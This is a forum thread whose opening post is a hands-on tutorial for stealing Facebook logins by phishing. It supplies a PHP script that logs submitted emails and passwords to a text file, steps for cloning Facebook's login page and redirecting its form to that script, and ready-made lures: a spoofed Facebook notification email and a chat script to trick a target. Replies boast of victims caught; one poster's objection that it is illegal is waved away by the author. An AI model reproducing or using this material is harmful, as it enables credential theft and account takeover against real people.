Post: Tutorial on howto hack Facebook accounts. (Phishing)
05-07-2010, 08:12 AM #1
lxzer
Do a barrel roll!
(adsbygoogle = window.adsbygoogle || []).push({});
Hack
A


Facebook


Account



Gaining access to ones Facebook account without any prior knowledge to the users password prior to phishing is not as hard as one may pres-eve it to be. Read on and you will learn how to do this.

How will this be done? You will be able to gain acess to another users facebook profile by using a method known as "phishing"

Phishing.

What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.

Lets get started!

HOW

Sign up on a free webpage hosting site. I prefer You must login or register to view this content. as it is the easiest free hosting site to use (in my opinion) and doesn't remove your webpage once it has been created.

Once you have signed up click on " You must login or register to view this content. "

Now click on " You must login or register to view this content. "

Once you are in your files click on create text file.

You are going to need to name the file " Login.php " (Don't include quotations )

You are now going to visit this site by clicking You must login or register to view this content.

You are going to now view the source of the page and select all of the text, you are going to copy the text.

now go on back to your text file named " login.php " that you made earlier. You are going to paste the text that you copied from Facebook into your text file. Once done, click on "create"

Now go back to " My Files " And create another text file.

You are going to name this file " Phishing.php " (Don't include quotations )

now copy and paste this:

Originally posted by another user
<?php
header ('Location: You must login or register to view this content. 'Winky Winky;
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>


Replace "XXXXXXXXXXXXXXXX" with your ripway username.

Now click on create.

go back to " my files " and your going to want to click on "edit" for your " login.php " file.

Once your editing " login.php " Your going to want to click in the body of the text and hit Ctrl F. This will open up a find function and your going to type in " action " ( without quotations )

It will bring you to something like this:


action="https://login.facebook.com/login.php?login_attempt=1"

your going to want to select everything within the quotations. ( You will select " You must login or register to view this content. " )

Now replace this with:

action="https://h1.ripway.com/XXXXXXXXXXXXXXXX/phishing.php?"

Replace the XXXXXXXXX's with your ripway username.

now click on " save "

Go back to " My Files " and go to where it says:

login.php
Direct Link: You must login or register to view this content.
[ Get HTML Codes | Rename | Edit ]

Copy " You must login or register to view this content. " The XXXX's will be your ripway username.

This is what your link to your webpage is, when you send this to people and they login to it their email and password will be displayed in " passwords.txt "

If at anytime you wish to view the email and password they entered just simply edit " passwords.txt " and bobs your uncle :y:

If for whatever reason this didn't work, then please ask a question on this thread. If this helped you then don't forget to thank or +REP me! Happy

Where I learned this: [ame="https://www.youtube.com/watch?v=0fJOxdDjPn8"]LINK.[/ame]

HOWTO CONVINCE YOUR VICTIM TO LOGIN TO YOUR FAKE WEBPAGE.


There is several ways this may be accomplished but one that almost always works is to email spoof your victim and appear as if your Facebook. I personally like to use " [email][email protected][/email] " as it is the official notification email sender for Facebook.

Simply putting in " You must verify your Facebook account " persons name " failure at verifying your account will result in termination of your account.

Or you could simply put something like:

Bob Smith commented on his status:

"that doesn't make sense"

Reply to this email to comment on this status.

To see the comment thread, follow the link below:
You must login or register to view this content.

Thanks,
The Facebook Team

___
Find people from your Windows Live Hotmail address book on Facebook! Go to: You must login or register to view this content.

This message was intended for private@ private.com. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.
You must login or register to view this content.
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.


There is quiet a few tutorials on email spoofing but for a quick easy way to start email spoofing just use this You must login or register to view this content.

Also just talking over MSN and starting up a convo maybe saying things like:

You say: Hey

Target says: Hey

You say: Whats up?

Target says: Nothing jc, you?

You say: Nothing bored, you know bob was talking shmmmaccck about you right?

Target says: no, what?

You say: Yea its on Facebook he was calling you a silly pelican

Target says: that kid really grinds my gears, where did he post this?

You say: You must login or register to view this content.


And bobs your uncle :y:

Use whatever method works for you or create your own and post them here. Also Sending ripway links or any other phishing links directly over Facebook chat will get you suspended for a day or two, as i was suspended.

Plain and simple, this is as far as I know the only trojan/backdoor/keylogger free way to gain access to someones Facebook account. There is no " Facebook password cracker " Out there that works as far as im aware.

This was my first tutorial I have posted on this site so give me some critique, or if you thought it was a good tutorial or not!

This is pretty simple, but if you have any problems then just let me know!

If this helped you then don't forget to thank or +REP!
Last edited by lxzer ; 10-18-2010 at 03:30 AM.

The following 33 users say thank you to lxzer for this useful post:

2RAW4THESTREET, Car Lover, Chewcracka, Classy., Cpt.Hayden, Darknesse13, Docko412, Encopresis, ESQ_Pugh, FAKA_ELITE, FourzerotwoFAILS, free, Goutinator, Joshycc, Matt1511, Mezzid, Mr. Star, Mudkipzzzz, Nejidam, NeverMoreModz, ozzy21, PatheticBowler, Perfekt, Pichu, Pro Era, Samos95, Toon_Squad, Weescotty, wiseguy48, wite_guy, xMagiik
06-18-2010, 08:26 AM #38
-PLuTo
Do a barrel roll!
wow, thats insane
06-19-2010, 03:20 AM #39
i try this many time but its not working everything works except for the password.txt i cant see the user and pass its just a blank page
06-19-2010, 04:27 AM #40
lxzer
Do a barrel roll!
Originally posted by maddogjeff View Post
i try this many time but its not working everything works except for the password.txt i cant see the user and pass its just a blank page


mine is still up and working so everything still works, you must of done something wrong, go over the steps again and see if you missed something.
06-20-2010, 04:32 AM #41
Chewcracka
Bounty hunter
Thanks Bro this is awesome it actually works! Soo many people hav fell for it
06-20-2010, 04:46 AM #42
Phishing is illegal in many countries..not worth it for a facebook account ..lol
06-20-2010, 09:08 PM #43
lxzer
Do a barrel roll!
Originally posted by Unit View Post
Phishing is illegal in many countries..not worth it for a facebook account ..lol


so is downloading music. does that stop people? no.
06-20-2010, 09:32 PM #44
Originally posted by lxzer View Post
so is downloading music. does that stop people? no.


Downloading music does not involve taking other peoples private information.. You also will not go to court for downloading music..(assuming you do not redistrubute it)
06-21-2010, 08:06 AM #45
lxzer
Do a barrel roll!
Originally posted by Unit View Post
Downloading music does not involve taking other peoples private information.. You also will not go to court for downloading music..(assuming you do not redistrubute it)


What im saying is that noone cares if its against the law or not.. noone cares if phishing is illegal or only going to get in trouble if it involves credit cards or other personal information like that, not because someone got there Facebook account hacked.
06-21-2010, 08:17 AM #46
Originally posted by lxzer View Post
What im saying is that noone cares if its against the law or not.. noone cares if phishing is illegal or only going to get in trouble if it involves credit cards or other personal information like that, not because someone got there Facebook account hacked.


The people getting hacked care, and if you mess with the wrong person you will end up getting caught. They simply have to get the IP of the one who logged in on the account, contact their ISP regarding the matter and the ISP can look at logs and monitor traffic. Then they will see the uploading/hosting of the copyrighted/phishing content and can terminate their service as well as take legal action if the victim feels it is necessary.

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo